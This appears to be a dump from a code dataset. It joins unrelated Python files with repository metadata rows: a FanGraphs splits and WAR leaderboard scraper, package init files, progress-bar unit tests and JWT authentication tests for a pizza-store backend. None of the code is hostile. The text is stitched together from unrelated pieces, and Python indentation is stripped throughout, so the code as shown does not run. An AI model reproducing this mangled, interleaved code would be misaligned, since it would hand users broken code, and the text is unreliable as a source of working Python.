Scraper for the FanGraphs `Splits Leaderboards`_ page.
.. _Splits Leaderboards: https://fangraphs.com/leaders/splits-leaderboards
"""
__selections = {}
__dropdowns = {}
__splits = {}
__quick_splits = leaders_sel.Splits.quick_splits
__switches = {}
__waitfor = leaders_sel.Splits.waitfor
address = "https://fangraphs.com/leaders/splits-leaderboards"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
self.set_filter_group("Show All")
self.configure("auto_pt", "False", autoupdate=True)
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.Splits.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.Splits.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> ul > li")
)
for cat, sel in leaders_sel.Splits.splits.items():
self.__splits.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> ul > li")
)
for cat, sel in leaders_sel.Splits.switches.items():
self.__switches.setdefault(
cat, selectors.Switches(self.soup, sel)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
queries.extend(list(cls.__splits))
queries.extend(list(cls.__switches))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
elif query in self.__splits:
options = self.__splits[query].list_options()
elif query in self.__switches:
options = ["True", "False"]
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option(s) which a filter query is currently set to.
Most dropdown- and split-class filter queries can be configured to multiple options.
For those filter classes, a list is returned, while other filter classes return a string.
- Selection-class: ``str``
- Dropdown-class: ``list``
- Split-class: ``list``
- Switch-class: ``str``
:param query: The filter query being retrieved of its current option
:return: The option(s) which the filter query is currently set to
:rtype: str or list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=2, multiple=True)
elif query in self.__splits:
option = self.__splits[query].current_option(opt_type=2, multiple=True)
elif query in self.__switches:
option = self.__switches[query].current_option(opt_type=2)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str, *, autoupdate=False):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:param autoupdate: If ``True``, :py:meth:`update` will be called following configuration
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
self._close_ad()
query = query.lower()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
elif query in self.__splits:
self.__splits[query].configure(self.page, option)
elif query in self.__switches:
options = [o.lower() for o in self.list_options(query)]
if option.lower() not in options:
raise fangraphs.exceptions.InvalidFilterOption(option)
if option != self.current_option(query)[0].title():
self.page.click(self.__switches[query])
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
if autoupdate:
self.update()
self._refresh_parser()
def update(self):
"""
Clicks the **Update** button of the page.
All configured filters are submitted and the page is refreshed.
:raises FanGraphs.exceptions.FilterUpdateIncapability: No filter queries to update
"""
elem = self.page.query_selector("#button-update")
if elem is None:
raise fangraphs.exceptions.FilterUpdateIncapability()
self._close_ad()
elem.click()
self._refresh_parser()
def list_filter_groups(self):
"""
Lists the possible groups of filter queries which can be used
:return: Names of the groups of filter queries
:rtype: list
"""
elems = self.soup.select(".fgBin.splits-bin-controller div")
groups = [e.getText() for e in elems]
return groups
def set_filter_group(self, group="Show All"):
"""
Configures the available filters to a specified group of filters
:param group: The name of the group of filters
"""
selector = ".fgBin.splits-bin-controller div"
elems = self.soup.select(selector)
options = [e.getText() for e in elems]
try:
index = options.index(group)
except ValueError as err:
raise fangraphs.exceptions.InvalidFilterGroup(group) from err
self._close_ad()
elem = self.page.query_selector_all(selector)[index]
elem.click()
def reset_filters(self):
"""
Resets filters to the original option(s).
This does not affect the following filter queries:
- ``group``
- ``stat``
- ``type``
- ``groupby``
- ``preset_range``
- ``auto_pt``
- ``split_teams``
"""
elem = self.page.query_selector(
"#stack-buttons .fgButton.small:nth-last-child(1)"
)
if elem is None:
return
self._close_ad()
elem.click()
@classmethod
def list_quick_splits(cls):
"""
Lists all the quick splits which can be used.
Quick splits allow for the configuration of multiple filter queries at once.
:return: All available quick splits
:rtype: list
"""
return list(cls.__quick_splits)
def set_to_quick_split(self, quick_split: str, autoupdate=True):
"""
Invokes the configuration of a quick split.
All filter queries affected by :py:meth:`reset_filters` are reset prior to configuration.
This action is performed by the FanGraphs API and cannot be prevented.
:param quick_split: The quick split to invoke
:param autoupdate: If ``True``, :py:meth:`reset_filters` will be called
:raises FanGraphs.exceptions.InvalidQuickSplits: Invalid argument ``quick_split``
"""
quick_split = quick_split.lower()
try:
selector = self.__quick_splits[quick_split]
except ValueError as err:
raise fangraphs.exceptions.InvalidQuickSplit(quick_split) from err
self._close_ad()
self.page.click(selector)
if autoupdate:
self.update()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data(".data-export", path)
class WAR(ScrapingUtilities):
"""
Scraper for the FanGraphs `Combined WAR Leaderboards`_ page.
.. _Combined WAR Leaderboards: https://www.fangraphs.com/warleaders.aspx
"""
__dropdowns = {}
__waitfor = leaders_sel.WAR.waitfor
address = "https://fangraphs.com/warleaders.aspx"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.WAR.dropdowns.items():
options = leaders_sel.WAR.dropdown_options[cat]
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > ul > li", options)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__dropdowns))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=1)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data("#WARBoard1_cmdCSV", path)
| 36.370986 | 97 | 0.621989 | 3,815 | 32,843 | 5.18768 | 0.078899 | 0.028346 | 0.025567 | 0.020464 | 0.802183 | 0.76363 | 0.740943 | 0.713304 | 0.699106 | 0.694861 | 0 | 0.001148 | 0.283957 | 32,843 | 902 | 98 | 36.411308 | 0.840413 | 0.320342 | 0 | 0.716327 | 0 | 0.002041 | 0.039781 | 0.008055 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126531 | false | 0 | 0.014286 | 0 | 0.267347 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
144437eb7be799a2146a12b331b97f89a5f805f0 | 210 | py | Python | hakai_segmentation/__init__.py | tayden/hakai-segmentation | d8b3ddf7bb5c53144272993e99b6195e56133afd | [
"MIT"
] | 3 | 2022-02-24T05:01:53.000Z | 2022-02-24T21:20:55.000Z | hakai_segmentation/__init__.py | tayden/hakai-segmentation | d8b3ddf7bb5c53144272993e99b6195e56133afd | [
"MIT"
] | null | null | null | hakai_segmentation/__init__.py | tayden/hakai-segmentation | d8b3ddf7bb5c53144272993e99b6195e56133afd | [
"MIT"
] | null | null | null | from hakai_segmentation import geotiff_io, models
from hakai_segmentation.lib import find_kelp, find_mussels
from hakai_segmentation.managers import GeotiffSegmentation
__all__ = ['find_kelp', 'find_mussels']
| 35 | 59 | 0.852381 | 27 | 210 | 6.185185 | 0.518519 | 0.161677 | 0.377246 | 0.227545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090476 | 210 | 5 | 60 | 42 | 0.874346 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
21279ee7c6d0821ee7a34a783cf9aae5ba07b6e0 | 40 | py | Python | sstcam_simulation/utils/sipm/__init__.py | sstcam/sstcam-simulation | 3fb67ba64329c201d3995971e5f377c5ec71b18e | [
"BSD-3-Clause"
] | 1 | 2019-12-23T23:26:36.000Z | 2019-12-23T23:26:36.000Z | sstcam_simulation/utils/sipm/__init__.py | cta-chec/sstCASSIM | 75bb863675991f1a36b7d430f9253ae09416f33e | [
"BSD-3-Clause"
] | 6 | 2020-09-18T10:59:41.000Z | 2022-03-15T11:01:49.000Z | sstcam_simulation/utils/sipm/__init__.py | cta-chec/sstCASSIM | 75bb863675991f1a36b7d430f9253ae09416f33e | [
"BSD-3-Clause"
] | 2 | 2020-04-14T08:01:01.000Z | 2021-11-30T12:11:17.000Z | from .overvoltage import SiPMOvervoltage | 40 | 40 | 0.9 | 4 | 40 | 9 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 40 | 1 | 40 | 40 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2165a684aa6f4ac3936ae4baaab8227957764de5 | 7,027 | py | Python | tests/test_progress_progressbarbits.py | Robpol86/etaprogress | 224e8a248c2bf820bad218763281914ad3983fff | [
"MIT"
] | 13 | 2015-08-25T05:54:21.000Z | 2021-03-23T15:56:58.000Z | tests/test_progress_progressbarbits.py | Robpol86/etaprogress | 224e8a248c2bf820bad218763281914ad3983fff | [
"MIT"
] | 5 | 2015-03-14T16:31:38.000Z | 2019-01-13T20:46:25.000Z | tests/test_progress_progressbarbits.py | Robpol86/etaprogress | 224e8a248c2bf820bad218763281914ad3983fff | [
"MIT"
] | 5 | 2015-05-31T14:16:50.000Z | 2021-02-06T11:23:43.000Z | from etaprogress import eta
from etaprogress.components import misc
from etaprogress.progress import ProgressBarBits
def test_undefined():
misc.terminal_width = lambda: 50
progress_bar = ProgressBarBits(None, max_width=30)
assert '0 b [? ] eta --:-- /' == str(progress_bar)
assert '0 b [ ? ] eta --:-- -' == str(progress_bar)
assert '0 b [ ? ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 10
assert '10 b [ ? ] eta --:-- |' == str(progress_bar)
assert '10 b [ ? ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 100
assert '100 b [ ? ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 1954727
assert '1.95 mb [ ? ] eta --:-- \\' == str(progress_bar)
assert '1.95 mb [ ?] eta --:-- |' == str(progress_bar)
def test_defined():
progress_bar = ProgressBarBits(2000)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 102
assert ' 5% (0.10/2.00 kb) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% (0.10/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 281
assert ' 14% (0.28/2.00 kb) [## ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 593
assert ' 29% (0.59/2.00 kb) [#### ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 1925
assert ' 96% (1.92/2.00 kb) [############### ] eta 00:01 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 1999
assert ' 99% (1.99/2.00 kb) [############### ] eta 00:01 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 2000
assert '100% (2.00/2.00 kb) [################] eta 00:00 -' == str(progress_bar)
assert '100% (2.00/2.00 kb) [################] eta 00:00 \\' == str(progress_bar)
assert '100% (2.00/2.00 kb) [################] eta 00:00 |' == str(progress_bar)
def test_defined_rounded():
progress_bar = ProgressBarBits(1999)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 1998
assert ' 99% (1.99/2.00 kb) [############### ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 1999
assert '100% (2.00/2.00 kb) [################] eta --:-- \\' == str(progress_bar)
assert '100% (2.00/2.00 kb) [################] eta --:-- |' == str(progress_bar)
def test_defined_hour():
progress_bar = ProgressBarBits(2000)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 2
assert ' 0% (0.00/2.00 kb) [ ] eta 1:06:36 \\' == str(progress_bar)
def test_defined_wont_fit():
progress_bar = ProgressBarBits(2000, max_width=33)
assert ' 0% (0.00/2.00 kb) [] eta --:-- |' == str(progress_bar)
progress_bar = ProgressBarBits(2000, max_width=30)
assert ' 0% (0.00/2.00 kb) [] eta --:-- /' == str(progress_bar)
def test_defined_long():
misc.terminal_width = lambda: 42
progress_bar = ProgressBarBits(20)
assert ' 0% ( 0/20 b) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% ( 0/20 b) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 5% ( 1/20 b) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% ( 1/20 b) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 2
assert ' 10% ( 2/20 b) [# ] eta 00:09 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 3
assert ' 15% ( 3/20 b) [# ] eta 00:09 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 4
assert ' 20% ( 4/20 b) [## ] eta 00:08 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 5
assert ' 25% ( 5/20 b) [### ] eta 00:08 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 6
assert ' 30% ( 6/20 b) [### ] eta 00:07 -' == str(progress_bar)
eta._NOW = lambda: 1411868725.0
progress_bar.numerator = 7
assert ' 35% ( 7/20 b) [#### ] eta 00:07 \\' == str(progress_bar)
eta._NOW = lambda: 1411868725.5
progress_bar.numerator = 8
assert ' 40% ( 8/20 b) [##### ] eta 00:06 |' == str(progress_bar)
eta._NOW = lambda: 1411868726.0
progress_bar.numerator = 9
assert ' 45% ( 9/20 b) [##### ] eta 00:06 /' == str(progress_bar)
eta._NOW = lambda: 1411868726.5
progress_bar.numerator = 10
assert ' 50% (10/20 b) [###### ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868727.0
progress_bar.numerator = 11
assert ' 55% (11/20 b) [####### ] eta 00:05 \\' == str(progress_bar)
eta._NOW = lambda: 1411868727.5
progress_bar.numerator = 12
assert ' 60% (12/20 b) [####### ] eta 00:04 |' == str(progress_bar)
eta._NOW = lambda: 1411868728.0
progress_bar.numerator = 13
assert ' 65% (13/20 b) [######## ] eta 00:04 /' == str(progress_bar)
eta._NOW = lambda: 1411868728.5
progress_bar.numerator = 14
assert ' 70% (14/20 b) [######### ] eta 00:03 -' == str(progress_bar)
eta._NOW = lambda: 1411868729.0
progress_bar.numerator = 15
assert ' 75% (15/20 b) [######### ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868729.5
progress_bar.numerator = 16
assert ' 80% (16/20 b) [########## ] eta 00:02 |' == str(progress_bar)
eta._NOW = lambda: 1411868730.0
progress_bar.numerator = 17
assert ' 85% (17/20 b) [########### ] eta 00:02 /' == str(progress_bar)
eta._NOW = lambda: 1411868730.5
progress_bar.numerator = 18
assert ' 90% (18/20 b) [########### ] eta 00:01 -' == str(progress_bar)
eta._NOW = lambda: 1411868731.0
progress_bar.numerator = 19
assert ' 95% (19/20 b) [############ ] eta 00:01 \\' == str(progress_bar)
eta._NOW = lambda: 1411868731.5
progress_bar.numerator = 20
assert '100% (20/20 b) [#############] eta 00:00 |' == str(progress_bar)
| 37.37766 | 85 | 0.542764 | 932 | 7,027 | 3.940987 | 0.111588 | 0.275524 | 0.198203 | 0.152736 | 0.772938 | 0.754424 | 0.71658 | 0.703512 | 0.676286 | 0.654506 | 0 | 0.169527 | 0.262132 | 7,027 | 187 | 86 | 37.57754 | 0.538862 | 0 | 0 | 0.257353 | 0 | 0.007353 | 0.318344 | 0 | 0 | 0 | 0 | 0 | 0.382353 | 1 | 0.044118 | false | 0 | 0.022059 | 0 | 0.066176 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dcc064edb2b2474f1395d3ac8ae03ce3be66fffb | 44 | py | Python | camunda/api/__init__.py | IvanovPvl/camunda-py | c46a4258ba28bab3af4b02a5207cd4ea9bd1b6a7 | [
"MIT"
] | null | null | null | camunda/api/__init__.py | IvanovPvl/camunda-py | c46a4258ba28bab3af4b02a5207cd4ea9bd1b6a7 | [
"MIT"
] | null | null | null | camunda/api/__init__.py | IvanovPvl/camunda-py | c46a4258ba28bab3af4b02a5207cd4ea9bd1b6a7 | [
"MIT"
] | null | null | null | # flake8: noqa
from .client import ApiClient | 22 | 29 | 0.795455 | 6 | 44 | 5.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.136364 | 44 | 2 | 29 | 22 | 0.894737 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dcd3ccf860f0f0e28209e9e3058f444bae3f1e0c | 72 | py | Python | src/torch/models/classification/__init__.py | AkibMashrur/dl-pipelines-gcp | 4c2c0a049cd24e21f90566d6b0bf42a3c1e14048 | [
"Apache-2.0"
] | null | null | null | src/torch/models/classification/__init__.py | AkibMashrur/dl-pipelines-gcp | 4c2c0a049cd24e21f90566d6b0bf42a3c1e14048 | [
"Apache-2.0"
] | null | null | null | src/torch/models/classification/__init__.py | AkibMashrur/dl-pipelines-gcp | 4c2c0a049cd24e21f90566d6b0bf42a3c1e14048 | [
"Apache-2.0"
] | null | null | null | from .smallCNN import *
from .twinCNN import *
from .helingerNN import * | 24 | 25 | 0.763889 | 9 | 72 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 72 | 3 | 25 | 24 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0d0c715a4bbfa053a5f1d6e062b34f6a3b5a7826 | 38 | py | Python | qarc-gym/qarc/gym_qarc/envs/__init__.py | kasimte/QARC | 0aec7ea3331a912e36ea8003a7f92cee148ed913 | [
"BSD-3-Clause"
] | 40 | 2018-12-03T01:49:15.000Z | 2022-03-20T03:57:03.000Z | qarc-gym/qarc/gym_qarc/envs/__init__.py | kasimte/QARC | 0aec7ea3331a912e36ea8003a7f92cee148ed913 | [
"BSD-3-Clause"
] | 7 | 2020-03-11T09:36:40.000Z | 2021-12-14T01:53:22.000Z | qarc-gym/qarc/gym_qarc/envs/__init__.py | kasimte/QARC | 0aec7ea3331a912e36ea8003a7f92cee148ed913 | [
"BSD-3-Clause"
] | 19 | 2018-11-02T08:07:25.000Z | 2021-09-23T09:57:13.000Z | from gym_qarc.envs.qarc import QARCEnv | 38 | 38 | 0.868421 | 7 | 38 | 4.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b4a3f7fa6dfad6f59d6d8ebff5e32517bba8c347 | 201 | py | Python | getsms/exceptions.py | kamilgg/getsms | 34b3294df2767b2b62314a0e3f79223dd065eecd | [
"MIT"
] | 1 | 2020-10-05T01:17:09.000Z | 2020-10-05T01:17:09.000Z | getsms/exceptions.py | kamilgg/getsms | 34b3294df2767b2b62314a0e3f79223dd065eecd | [
"MIT"
] | null | null | null | getsms/exceptions.py | kamilgg/getsms | 34b3294df2767b2b62314a0e3f79223dd065eecd | [
"MIT"
] | null | null | null | class APIError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class ServiceAccountError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
| 22.333333 | 37 | 0.691542 | 22 | 201 | 5.590909 | 0.363636 | 0.260163 | 0.357724 | 0.325203 | 0.699187 | 0.699187 | 0.699187 | 0.699187 | 0.699187 | 0 | 0 | 0 | 0.199005 | 201 | 8 | 38 | 25.125 | 0.763975 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
372d3c72d65f581fc445f3b38de62c3c4e5065d0 | 4,163 | py | Python | tests/tests_services/test_auth.py | astsu-dev/pizza-store-backend | 902f6e5e2c88ba029b2bff61da8fc4684664ead9 | [
"MIT"
] | 2 | 2021-07-10T15:47:45.000Z | 2021-12-13T18:09:30.000Z | tests/tests_services/test_auth.py | astsu-dev/pizza-store-backend | 902f6e5e2c88ba029b2bff61da8fc4684664ead9 | [
"MIT"
] | null | null | null | tests/tests_services/test_auth.py | astsu-dev/pizza-store-backend | 902f6e5e2c88ba029b2bff61da8fc4684664ead9 | [
"MIT"
] | null | null | null | import datetime
import uuid
import jwt
import pytest
from fastapi import HTTPException, status
from pizza_store import models
from pizza_store.enums import ProductPermission, Role
from pizza_store.services import AuthService
from pizza_store.settings import settings
def test_get_current_user_with_valid_token() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
result = AuthService.get_current_user()(token)
assert result == models.UserInToken(
username="test",
email="test@example.com",
id=uuid.UUID("ec3365b2-b014-4b2e-ba00-a7fe119d5e09"),
role=Role.USER,
)
def test_get_current_user_with_invalid_secret_key() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(jwt_payload, key="invalid key", algorithm=settings.JWT_ALGORITHM)
with pytest.raises(HTTPException) as excinfo:
AuthService.get_current_user()(token)
assert excinfo.value.status_code == status.HTTP_401_UNAUTHORIZED
def test_get_current_user_with_expired_token() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime - datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
with pytest.raises(HTTPException) as excinfo:
AuthService.get_current_user()(token)
assert excinfo.value.status_code == status.HTTP_401_UNAUTHORIZED
def test_get_current_user_with_valid_required_permissions() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
result = AuthService.get_current_user(
required_permissions=(ProductPermission.READ,)
)(token)
assert result == models.UserInToken(
username="test",
email="test@example.com",
id=uuid.UUID("ec3365b2-b014-4b2e-ba00-a7fe119d5e09"),
role=Role.USER,
)
def test_get_current_user_with_invalid_required_permissions() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
with pytest.raises(HTTPException) as excinfo:
AuthService.get_current_user(required_permissions=(ProductPermission.CREATE,))(
token
)
assert excinfo.value.status_code == status.HTTP_403_FORBIDDEN
